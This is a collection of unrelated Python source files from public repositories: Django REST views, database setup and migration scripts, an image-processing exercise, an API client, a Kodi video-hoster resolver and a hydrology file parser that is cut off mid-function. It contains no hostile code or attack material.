     if serializer.is_valid():\r\n            task = serializer.save()\r\n            if task:\r\n                json = serializer.data\r\n                return Response(json, status=status.HTTP_201_CREATED)\r\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass ClassesAPIView(APIView):\r\n    def get(self, request, id=None):\r\n        serializer = ClassesSerializer()\r\n        if id:\r\n            classes = Classes.objects.filter(id_course=id)\r\n            serializer = ClassesSerializer(classes, many=True)\r\n        else:\r\n            classes = 
Classes.objects.all()\r\n serializer = ClassesSerializer(classes, many=True)\r\n return Response(serializer.data)\r\n\r\nclass ClassesCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = ClassesSerializer(data=request.data)\r\n presence_serializer = StudentPresenceSerializer(data=request.data)\r\n if serializer.is_valid():\r\n task = serializer.save()\r\n id_course = serializer.data['id_course']\r\n id_classes = serializer.data['id']\r\n print(id_classes)\r\n user_course = UserCourse.objects.filter(id_course=id_course).values()\r\n for el in user_course:\r\n UserClasses.objects.create(id_classes=Classes.objects.get(id=id_classes),\r\n id_student=User.objects.get(id=el['id_user_id']))\r\n if task:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n# class PresenceAPIView(APIView):\r\n#\r\n# def get(self, request, id=None, id_student=None, id_course=None):\r\n# serializer = PresenceSerializer()\r\n# if id:\r\n# articles = Presence.objects.get(id=id)\r\n# serializer = PresenceSerializer(articles)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_student and id_course:\r\n# articles = Presence.objects.filter(id_student=id_student, id_course=id_course)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_student:\r\n# articles = Presence.objects.filter(id_student=id_student)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_course:\r\n# articles = Presence.objects.filter(id_course=id_course)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# else:\r\n# articles = Presence.objects.all()\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n#\r\n#\r\n# class PresenceCreate(APIView):\r\n# def post(self, request, format='json'):\r\n# serializer = PresenceSerializer(data=request.data)\r\n# if serializer.is_valid():\r\n# presence = serializer.save()\r\n# if presence:\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass UserTasksFilesCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = UserTasksFilesSerializer(data=request.data)\r\n if serializer.is_valid():\r\n new_assignment = serializer.save()\r\n if new_assignment:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass UserTasksFilesAPIView(APIView):\r\n def get(self, request, id_course=None):\r\n if id_course:\r\n tasks_from_course = Task.objects.filter(id_course=id_course)\r\n tasks_ids_to_retrieve = [el.__dict__['id'] for el in tasks_from_course]\r\n articles = User_Tasks_Files.objects.filter(id_task__in = tasks_ids_to_retrieve)\r\n serializer = UserTasksFilesSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, 
status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass StudentPresenceAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = StudentPresenceSerializer()\r\n if id:\r\n presence_list = UserClasses.objects.filter(id_classes=id)\r\n serializer = StudentPresenceSerializer(presence_list, many=True)\r\n else:\r\n presence_list = UserClasses.objects.all()\r\n serializer = StudentPresenceSerializer(presence_list, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\nclass StudentPresenceAdd(APIView):\r\n def post(self, request, format='json'):\r\n serializer = StudentPresenceSerializer(data=request.data)\r\n if serializer.is_valid():\r\n new_presence = serializer.save()\r\n if new_presence:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass StudentPresenceDetails(APIView):\r\n def get_object(self, id_classes, id_student):\r\n try:\r\n return UserClasses.objects.get(Q(id_classes=id_classes) & Q(id_student=id_student))\r\n except Opinions.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n def put(self, request, id_classes, id_student):\r\n presence = self.get_object(id_classes, id_student)\r\n serializer = StudentPresenceSerializer(presence, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n def get(self, request, id_classes, id_student):\r\n presence = self.get_object(id_classes, id_student)\r\n serializer = StudentPresenceSerializer(presence)\r\n return Response(serializer.data)\r\n\r\n\r\nclass UserCourseAPIView(APIView):\r\n def get(self, request, id_user=None, id_course=None):\r\n if id_course and id_user:\r\n articles = UserCourse.objects.filter(id_user=id_user, id_course=id_course)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_user:\r\n articles = UserCourse.objects.filter(id_user=id_user)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_course:\r\n articles = UserCourse.objects.filter(id_course=id_course)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n else:\r\n articles = UserCourse.objects.all()\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n\r\nclass UserCourseCreate(APIView):\r\n def post(self, request):\r\n serializer = UserCourseSerializer(data=request.data)\r\n if serializer.is_valid():\r\n presence = serializer.save()\r\n if presence:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"przemyslawmarkiewicz/projekt-io","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28404918692","text":"from neo4j_api import neo4j_connection\r\n\r\nneo4j_session = neo4j_connection.session()\r\n\r\nuser_init = 'create 
(n:User) set n = {email:\"ivana.zhangyf@gmail.com\", \\\r\nfirst_name:\"admin\", last_name:\"admin\", name:\"stage-admin\", path:\"users\", role:\"admin\"} return n'\r\n\r\nneo4j_session.run(user_init)\r\n\r\n\r\ndb_constraint_init = '''\r\n CREATE CONSTRAINT constraint_code\r\n ON (n:Container)\r\n ASSERT n.code IS UNIQUE\r\n'''\r\n\r\nneo4j_session.run(db_constraint_init)","repo_name":"vre-charite/dataset_neo4j","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35146230793","text":"\"\"\"change picture_id column to image_id in liked_image table\n\nRevision ID: 4eeecfcdffc8\nRevises: 98d4066f20be\nCreate Date: 2022-07-25 20:13:41.809235\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4eeecfcdffc8'\ndown_revision = '98d4066f20be'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.alter_column(\"liked_image\", \"picture_id\", new_column_name=\"image_id\")\n\n\ndef downgrade():\n op.alter_column(\"liked_image\", \"image_id\", new_column_name=\"picture_id\")\n","repo_name":"hisownspace/isntagram","sub_path":"migrations/versions/20220725_201341_.py","file_name":"20220725_201341_.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12983654509","text":"#run `pip install pillow` before\n#make sure you have `requests` lib installed\n#use https://pillow.readthedocs.io/en/stable/handbook/tutorial.html for reference\n\nfrom PIL import Image\nimport requests\nimport os\nimport threading\n\n\nURL = 'https://lp-cms-production.imgix.net/2019-06/4871827ef10d74079fb636806d371ccc-brighton-hove.jpg'\nURL2 = 'https://vjoy.cc/wp-content/uploads/2020/09/bezymyannyjkvytstsk.jpg'\nURL3 = 'https://i.pinimg.com/736x/95/30/41/953041070f000d45c05c912005f63724.jpg'\nURL5 = 'https://mirpozitiva.ru/wp-content/uploads/2019/11/1472042719_15.jpg'\n\ndef load_image(url, file_name='example.jpg'):\n with Image.open(requests.get(url, stream=True).raw) as image:\n image.save(os.path.join(os.getcwd(), file_name))\n\n\n\ndef print_image_data(file):\n image = Image.open(file)\n print(image.size, image.mode)\n\ndef is_square_image(file):\n image = Image.open(file)\n return image.size[0] == image.size[1]\n\ndef create_thumbnail(file):\n '''# TODO: handle all errors on thumbnail creation'''\n thumbnail_size = (200, 200)\n image = Image.open(file)\n image.thumbnail(thumbnail_size)\n image.save('thumbnail.jpg', 'JPEG')\n\ndef is_thumbnail(file):\n thumbnail_size = [200, 200]\n image = Image.open(file)\n return image.size == thumbnail_size\n\ndef rotate_image(file, degrees):\n image = Image.open(file)\n rotated = image.rotate(degrees)\n rotated.save('rotated.jpg')\n\ndef flip_image(file, direction):\n directions = {'LT': Image.FLIP_LEFT_RIGHT, 'TB': Image.FLIP_TOP_BOTTOM}\n image = Image.open(file)\n out = image.transpose(directions[direction])\n out.save('flipped.jpg')\n\ndef copy_images_to_dir(dirname):\n '''Copies all images from current folder into subfolder'''\n path = os.path.join(os.getcwd())\n for file in os.listdir(path):\n try:\n image = Image.open(file)\n image.save(os.path.join(os.getcwd(), dirname, image.filename))\n except:\n break\n\ndef delete_images(path=os.path.join(os.getcwd())):\n for file in os.listdir(path):\n if file.endswith('.jpg'):\n os.remove(file)\n\n''' TODO: create a function 
that will save rectangle area from given image to the separate file'''\n# with name 'rectangle.jpg'. Coordinates of rectangle have to be passed as tuple of 4 integers\ndef rectangular_area(file):\n path = os.path.join(os.getcwd(), 'images', file)\n box = (500, 150, 600, 300)\n with Image.open(path) as image:\n im_crop = image.crop(box)\n im_crop.save('rectangle.jpg', quality=95)\n\n\n\n\nif __name__ == '__main__':\n load_img = threading.Thread(target=load_image, args=(URL, 'img1.jpg'))\n load_img2 = threading.Thread(target=load_image, args=(URL2, 'img2.jpg'))\n load_img3 = threading.Thread(target=load_image, args=(URL3,'img3.jpg'))\n # load_img4 = threading.Thread(target=load_image, args=(URL4, 'img4.jpg'))\n load_img5 = threading.Thread(target=load_image, args=(URL5, 'img5.jpg'))\n load_img.start()\n load_img2.start()\n load_img3.start()\n # load_img4.start()\n load_img5.start()\n # load_image(URL)\n # print_image_data('example.jpg')\n # print(is_square_image('example.jpg'))\n # create_thumbnail('example.jpg')\n # print(is_thumbnail('thumbnail.jpg'))\n # rotate_image('images/example.jpg', 45)\n # flip_image('example.jpg', 'LT')\n # copy_images_to_dir('images')\n # delete_images()\n # rectangular_area('example.jpg')\n print('Done!')\n","repo_name":"RomanenkoDmitriy/schoolwork","sub_path":"lesson/lesson34/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1893758285","text":"# -*- coding: utf8 -*-\nimport logging\nimport time\nimport hashlib\nimport urllib2\nimport json\nimport urllib\n\nclass TaodianApi:\n\tappkey = \"63\"\n\tappSecret = \"c8bdecf1d3778e3a463475290886aa58\"\n\tapiUrl = \"http://api2.zaol.cn/api/route\"\n\tdef __init__(self):\n\t\tself.logger = logging.getLogger(\"click\")\n\t\t\n\t\tself.logger.info(\"the logger test\")\n\t\ttry:\n\t\t\tsetting = open(\"TaodianApi.conf\",\"r\")\n\t\t\ttry:\n\t\t\t\tline = setting.readline()\n\t\t\t\twhile line:\n\t\t\t\t\tdata = line.split(\"=\", 1)\n\t\t\t\t\tif data[0] == \"td_api_id\":\n\t\t\t\t\t\tself.appkey = data[1]\n\t\t\t\t\t\tself.logger.info(\"the appkey:%s\" % self.appkey)\n\t\t\t\t\tif data[0] == \"td_api_secret\":\n\t\t\t\t\t\tself.appSecret = data[1]\n\t\t\t\t\tline = setting.readline()\n\t\t\texcept:\n\t\t\t\tself.logger.info(\"read file error\")\n\t\t\tfinally:\n\t\t\t\tsetting.close()\n\t\texcept:\n\t\t\tself.logger.info(\"no found 'TaodianApi.conf'\")\n\t\n\tdef call(self, api, param):\n\t\tp = self.getSign()\n\t\tp[\"name\"] = api\n\t\tp[\"params\"] = json.dumps(param)\n\t\tfd = urllib2.urlopen(self.apiUrl,data = urllib.urlencode(p))\n\t\tresult = fd.read()\n\t\tfd.close()\n\t\t\n\t\treturn json.loads(result)\n\t\t\n\t\t\n\t\t\n\tdef getSign(self):\n\t\t\n\t\tstamp = time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time()))\n\t\tsignStr = self.appkey +\",\"+ stamp +\",\"+self.appSecret\n\t\t\n\t\tsign = hashlib.md5(signStr).hexdigest()\n\t\t\n\t\tp = {\"app_id\":self.appkey, \"time\":stamp, \"sign\":sign}\n\t\t\n\t\treturn p\n\t\t\n\n\n","repo_name":"emop/webrobot","sub_path":"sina_empower/libs/TaodianApi.py","file_name":"TaodianApi.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"45485891388","text":"import sys\n\ndef checkForOverlap(pair):\n comma = pair.find(',')\n elf1 = pair[0:comma]\n elf2 = pair[comma+1:]\n\n dash1 = elf1.find('-')\n elf1start = int(elf1[0:dash1])\n elf1end 
= int(elf1[dash1+1:])\n dash2 = elf2.find('-')\n elf2start = int(elf2[0:dash2])\n elf2end = int(elf2[dash2+1:])\n\n if ( (elf2start <= elf1start <= elf2end) or \\\n (elf2start <= elf1end <= elf2end) or \\\n (elf1start <= elf2start <= elf1end) or \\\n (elf1start <= elf2end <= elf1end) ):\n return True\n else:\n return False\n\nif __name__ == '__main__':\n totalOverlap = 0\n with open('4.txt', 'r') as file:\n lines = file.readlines()\n for pair in lines:\n if (checkForOverlap(pair.strip())):\n totalOverlap += 1\n\n print(totalOverlap)","repo_name":"wpgrant/aoc","sub_path":"2022/4b.py","file_name":"4b.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32691950179","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n# https://playtube.ws/embed-xxxxx.html\nimport re\n\nfrom resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.lib.parser import cParser\nfrom resources.hosters.hoster import iHoster\nfrom resources.lib.comaddon import dialog\nfrom resources.lib.packer import cPacker\n\nUA = 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'\n\n\nclass cHoster(iHoster):\n\n def __init__(self):\n iHoster.__init__(self, 'playtube', 'Playtube')\n\n def _getMediaLinkForGuest(self):\n oRequestHandler = cRequestHandler(self._url)\n sHtmlContent = oRequestHandler.request()\n\n sPattern2 = '(\\s*eval\\s*\\(\\s*function(?:.|\\s)+?\\)\\)\\))'\n aResult = re.findall(sPattern2, sHtmlContent)\n list_url = []\n list_qua = []\n if aResult:\n str2 = aResult[0]\n if not str2.endswith(';'):\n str2 = str2 + ';'\n\n strs = cPacker().unpack(str2)\n oParser = cParser()\n sPattern = '(https.+?.m3u8)'\n aResult = re.findall(sPattern, strs)\n if aResult:\n urlhost = aResult[0]\n oRequestHandler = cRequestHandler(urlhost)\n oRequestHandler.addHeaderEntry('User-Agent', UA)\n oRequestHandler.addHeaderEntry('Referer', self._url)\n sHtmlContent2 = oRequestHandler.request()\n oParser = cParser()\n sPattern = 'PROGRAM.*?BANDWIDTH.*?RESOLUTION=(\\d+x\\d+).*?(https.*?m3u8)'\n aResult = oParser.parse(sHtmlContent2, sPattern)\n if aResult[0] is True:\n for aEntry in aResult[1]:\n list_url.append(aEntry[1])\n list_qua.append(aEntry[0])\n\n api_call = dialog().VSselectqual(list_qua, list_url)\n\n if api_call:\n return True, api_call + '|User-Agent=' + UA + '&Referer=' + self._url\n\n return False, False\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/hosters/playtube.py","file_name":"playtube.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"35984776578","text":"from django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n path('',views.index, name = 'index'),\n path('index.html',views.index, name = 'index'),\n path('juego.html',views.juego, name = 'juego'),\n path('estadistica.html',views.estadistica, name = 'estadistica'),\n path('mi_estadistica.html',views.mi_estadistica, name = 'mi_estadistica'),\n path('stem.html',views.stem, name = 'stem'),\n path('SendLoginData',views.SendLoginData, name='SendLoginData'),\n path('StartSession',views.StartSession, name='StartSession'),\n path('AddTry',views.AddTry, name='AddTry'),\n path('AddDay',views.AddDay, name='AddDay'),\n path('UpdateTry',views.UpdateTry, name='UpdateTry'),\n path('UpdateSession',views.UpdateSession, name='UpdateSession'),\n path('minutosJugadosTotales',views.minutosJugadosTotales, name='minutosJugadosTotales'),\n path('minutosJugadosPromedio',views.minutosJugadosPromedio, name='minutosJugadosPromedio'),\n path('formulario',views.formulario, name='formulario'),\n\n]\n\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n","repo_name":"llFCAxelentell/WebSTEM","sub_path":"WEB/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6030224996","text":"def is_balanced(expression):\n stack = []\n brackets = {')': '(', '}': '{', ']': '['}\n for char in expression:\n if char in brackets.values():\n stack.append(char)\n elif char in brackets.keys():\n if stack == [] or brackets[char] != stack.pop():\n return False\n return stack == []\n\n\ndef remove_duplicates(sequence):\n result = []\n seen = set()\n for item in sequence:\n if item not in seen:\n result.append(item)\n seen.add(item)\n return result\n\n\n\ndef word_frequency(sentence):\n words = sentence.split()\n frequency = {}\n \n for word in words:\n if word in frequency:\n frequency[word] += 1\n else:\n frequency[word] = 1\n \n return frequency","repo_name":"Barasa-Micah/Data-Structures","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31230992341","text":"from future.utils import iteritems\n\nfrom . 
import parsetools as pt\n\ndef cardChunk(key, chunk):\n \"\"\"\n Parse Card Chunk Method\n \"\"\"\n for line in chunk:\n values = []\n sline = line.strip().split()\n\n for idx in range(1, len(sline)):\n values.append(sline[idx])\n\n return {'card': sline[0],\n 'values': values}\n\ndef connectChunk(key, chunk):\n \"\"\"\n Parse Card Chunk Method\n \"\"\"\n upLinks = []\n schunk = chunk[0].strip().split()\n\n for idx in range(4, len(schunk)):\n upLinks.append(schunk[idx])\n\n result = {'link': schunk[1],\n 'downLink': schunk[2],\n 'numUpLinks': schunk[3],\n 'upLinks': upLinks}\n\n return result\n\ndef linkChunk(key, chunk):\n \"\"\"\n Parse LINK Chunk Method\n \"\"\"\n # Extract link type card\n linkType = chunk[1].strip().split()[0]\n\n # Cases\n if linkType == 'DX':\n # Cross section link type handler\n result = xSectionLink(chunk)\n\n elif linkType == 'STRUCTURE':\n # Structure link type handler\n result = structureLink(chunk)\n\n elif linkType in ('RESERVOIR', 'LAKE'):\n # Reservoir link type handler\n result = reservoirLink(chunk)\n return result\n\ndef structureLink(lines):\n \"\"\"\n Parse STRUCTURE LINK Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'STRUCTURE',\n 'NUMSTRUCTS',\n 'STRUCTTYPE')\n\n WEIR_KEYWORDS = ('STRUCTTYPE',\n 'CREST_LENGTH',\n 'CREST_LOW_ELEV',\n 'DISCHARGE_COEFF_FORWARD',\n 'DISCHARGE_COEFF_REVERSE',\n 'CREST_LOW_LOC',\n 'STEEP_SLOPE',\n 'SHALLOW_SLOPE')\n\n CULVERT_KEYWORDS = ('STRUCTTYPE',\n 'UPINVERT',\n 'DOWNINVERT',\n 'INLET_DISCH_COEFF',\n 'REV_FLOW_DISCH_COEFF',\n 'SLOPE',\n 'LENGTH',\n 'ROUGH_COEFF',\n 'DIAMETER',\n 'WIDTH',\n 'HEIGHT')\n\n WEIRS = ('WEIR', 'SAG_WEIR')\n\n CULVERTS = ('ROUND_CULVERT', 'RECT_CULVERT')\n\n CURVES = ('RATING_CURVE', 'SCHEDULED_RELEASE', 'RULE_CURVE')\n\n result = {'type': 'STRUCTURE',\n 'header': {'link': None,\n 'numstructs': None},\n 'structures':[]}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Cases\n if key == 'STRUCTTYPE':\n # Structure handler\n structType = chunk[0].strip().split()[1]\n\n # Cases\n if structType in WEIRS:\n\n weirResult = {'structtype': None,\n 'crest_length': None,\n 'crest_low_elev': None,\n 'discharge_coeff_forward': None,\n 'discharge_coeff_reverse': None,\n 'crest_low_loc': None,\n 'steep_slope': None,\n 'shallow_slope': None}\n\n # Weir type structures handler\n result['structures'].append(structureChunk(WEIR_KEYWORDS, weirResult, chunk))\n\n elif structType in CULVERTS:\n\n culvertResult = {'structtype': None,\n 'upinvert': None,\n 'downinvert': None,\n 'inlet_disch_coeff': None,\n 'rev_flow_disch_coeff': None,\n 'slope': None,\n 'length': None,\n 'rough_coeff': None,\n 'diameter': None,\n 'width': None,\n 'height': None}\n\n # Culvert type structures handler\n result['structures'].append(structureChunk(CULVERT_KEYWORDS, culvertResult, chunk))\n\n elif structType in CURVES:\n # Curve type handler\n pass\n elif key != 'STRUCTURE':\n # All other variables header\n result['header'][key.lower()] = chunk[0].strip().split()[1]\n\n return result\n\ndef xSectionLink(lines):\n \"\"\"\n Parse Cross Section Links Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'DX',\n 'TRAPEZOID',\n 'TRAPEZOID_ERODE',\n 'TRAPEZOID_SUBSURFACE',\n 'ERODE_TRAPEZOID',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_TRAPEZOID',\n 'SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'ERODE_TRAPEZOID_SUBSURFACE',\n 'ERODE_SUBSURFACE_TRAPEZOID',\n 
'SUBSURFACE_TRAPEZOID_ERODE',\n 'SUBSURFACE_ERODE_TRAPEZOID',\n 'BREAKPOINT',\n 'BREAKPOINT_ERODE',\n 'BREAKPOINT_SUBSURFACE',\n 'ERODE_BREAKPOINT',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_BREAKPOINT',\n 'SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'ERODE_BREAKPOINT_SUBSURFACE',\n 'ERODE_SUBSURFACE_BREAKPOINT',\n 'SUBSURFACE_BREAKPOINT_ERODE',\n 'SUBSURFACE_ERODE_BREAKPOINT',\n 'TRAP',\n 'TRAP_ERODE',\n 'TRAP_SUBSURFACE',\n 'ERODE_TRAP',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_TRAP',\n 'SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'TRAP_SUBSURFACE_ERODE',\n 'ERODE_TRAP_SUBSURFACE',\n 'ERODE_SUBSURFACE_TRAP',\n 'SUBSURFACE_TRAP_ERODE',\n 'SUBSURFACE_ERODE_TRAP',\n 'NODES',\n 'NODE',\n 'XSEC')\n\n\n\n ERODE = ('TRAPEZOID_ERODE',\n 'TRAP_ERODE',\n 'TRAP_SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'BREAKPOINT_ERODE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE')\n\n SUBSURFACE = ('TRAPEZOID_SUBSURFACE',\n 'TRAP_SUBSURFACE',\n 'TRAP_SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE')\n\n result = {'type': 'XSEC',\n 'header': {'link': None,\n 'dx': None,\n 'xSecType': None,\n 'nodes': None,\n 'erode': False,\n 'subsurface': False},\n 'xSection': None,\n 'nodes': []}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Cases\n if key == 'NODE':\n # Extract node x and y\n result['nodes'].append(nodeChunk(chunk))\n\n elif key == 'XSEC':\n # Extract cross section information\n result['xSection'] = xSectionChunk(chunk)\n\n elif ('TRAPEZOID' in key) or ('BREAKPOINT' in key) or ('TRAP' in key):\n # Cross section type handler\n result['header']['xSecType'] = key\n\n elif key in ERODE:\n # Erode handler\n result['header']['erode'] = True\n\n elif key in SUBSURFACE:\n # Subsurface handler\n result['header']['subsurface'] = True\n\n else:\n # Extract all other variables into header\n result['header'][key.lower()] = chunk[0].strip().split()[1]\n\n return result\n\ndef reservoirLink(lines):\n \"\"\"\n Parse RESERVOIR Link Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'RESERVOIR',\n 'RES_MINWSE',\n 'RES_INITWSE',\n 'RES_MAXWSE',\n 'RES_NUMPTS',\n 'LAKE',\n 'MINWSE',\n 'INITWSE',\n 'MAXWSE',\n 'NUMPTS')\n\n result = {'header': {'link': None,\n 'res_minwse': None,\n 'res_initwse': None,\n 'res_maxwse': None,\n 'res_numpts': None,\n 'minwse': None,\n 'initwse': None,\n 'maxwse': None,\n 'numpts': None},\n 'type': None,\n 'points': []}\n\n pair = {'i': None,\n 'j': None}\n\n # Rechunk the chunk\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n schunk = chunk[0].strip().split()\n\n\n # Cases\n if key in ('NUMPTS', 'RES_NUMPTS'):\n # Points handler\n result['header'][key.lower()] = schunk[1]\n\n # Parse points\n for idx in range(1, len(chunk)):\n schunk = chunk[idx].strip().split()\n\n for count, ordinate in enumerate(schunk):\n # Divide ordinates into ij pairs\n if (count % 2) == 0:\n pair['i'] = ordinate\n else:\n pair['j'] = ordinate\n result['points'].append(pair)\n pair = {'i': None,\n 'j': None}\n\n elif key in ('LAKE', 'RESERVOIR'):\n # Type handler\n 
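# For a 'LAKE' or 'RESERVOIR' card the keyword itself is the link type, so\n # schunk[0] below is just that keyword (e.g. result['type'] == 'RESERVOIR');\n # the card format here is assumed from the other handlers in this module.\n 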
result['type'] = schunk[0]\n else:\n # Header variables handler\n result['header'][key.lower()] = schunk[1]\n return result\n\ndef nodeChunk(lines):\n \"\"\"\n Parse NODE Method\n \"\"\"\n # Constants\n KEYWORDS = ('NODE',\n 'X_Y',\n 'ELEV')\n\n result = {'node': None,\n 'x': None,\n 'y': None,\n 'elev': None}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n schunk = chunk[0].strip().split()\n if key == 'X_Y':\n result['x'] = schunk[1]\n result['y'] = schunk[2]\n else:\n result[key.lower()] = schunk[1]\n\n return result\n\ndef xSectionChunk(lines):\n \"\"\"\n Parse XSEC Method\n \"\"\"\n # Constants\n KEYWORDS = ('MANNINGS_N',\n 'BOTTOM_WIDTH',\n 'BANKFULL_DEPTH',\n 'SIDE_SLOPE',\n 'NPAIRS',\n 'NUM_INTERP',\n 'X1',\n 'ERODE',\n 'MAX_EROSION',\n 'SUBSURFACE',\n 'M_RIVER',\n 'K_RIVER')\n\n result = {'mannings_n': None,\n 'bottom_width': None,\n 'bankfull_depth': None,\n 'side_slope': None,\n 'npairs': None,\n 'num_interp': None,\n 'erode': False,\n 'subsurface': False,\n 'max_erosion': None,\n 'm_river': None,\n 'k_river': None,\n 'breakpoints': []}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Strip and split the line (only one item in each list)\n schunk = chunk[0].strip().split()\n\n # Cases\n if key == 'X1':\n # Extract breakpoint XY pairs\n x = schunk[1]\n y = schunk[2]\n result['breakpoints'].append({'x': x, 'y': y})\n\n if key in ('SUBSURFACE', 